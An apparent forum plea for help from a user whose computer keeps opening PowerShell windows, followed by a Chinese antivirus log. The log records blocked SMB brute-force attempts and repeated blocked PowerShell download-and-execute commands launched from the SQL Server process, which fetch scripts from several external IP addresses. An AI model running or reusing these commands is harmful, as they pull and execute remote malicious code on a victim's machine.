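My computer keeps opening PowerShell on its own, several windows at a time. It fills up all the memory, and sometimes the machine freezes. Experts, please help!!!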
【1】2024-10-15 16:11:34,网络防护,暴破攻击防护,受到192.168.0.130的网络攻击,已阻止
协议:SMBv2
远程地址:192.168.0.130:55052
本地地址:192.168.0.198:445
防御结果:已阻止
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【2】2024-10-15 16:09:39,网络防护,暴破攻击防护,受到192.168.0.144的网络攻击,已阻止
协议:SMBv2
远程地址:192.168.0.144:55714
本地地址:192.168.0.198:445
防御结果:已阻止
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【3】2024-10-15 16:02:28,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://23.94.61.165:15650/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【4】2024-10-15 16:02:27,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://23.94.61.165:15650/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【5】2024-10-15 16:02:26,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://62.3.6.65:18478/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【6】2024-10-15 16:02:26,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://62.3.6.65:18478/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【7】2024-10-15 16:02:25,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://144.48.227.75:17289/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【8】2024-10-15 16:02:25,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://144.48.227.75:17289/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【9】2024-10-15 15:49:36,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://124.193.140.189:17952/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【10】2024-10-15 15:49:36,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://124.193.140.189:17952/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【11】2024-10-15 15:49:35,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://146.190.252.38:11080/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【12】2024-10-15 15:49:34,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://146.190.252.38:11080/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【13】2024-10-15 15:49:34,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://46.17.45.73:17032/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【14】2024-10-15 15:49:33,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://46.17.45.73:17032/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【15】2024-10-15 15:27:02,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://124.133.240.174:16569/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【16】2024-10-15 15:27:01,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://124.133.240.174:16569/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【17】2024-10-15 15:27:00,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://146.190.252.38:11080/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【18】2024-10-15 15:27:00,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://146.190.252.38:11080/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【19】2024-10-15 15:27:00,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://46.17.45.73:17032/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【20】2024-10-15 15:26:59,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://46.17.45.73:17032/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【21】2024-10-15 15:09:24,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://146.190.252.38:11080/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【22】2024-10-15 15:09:24,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://146.190.252.38:11080/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>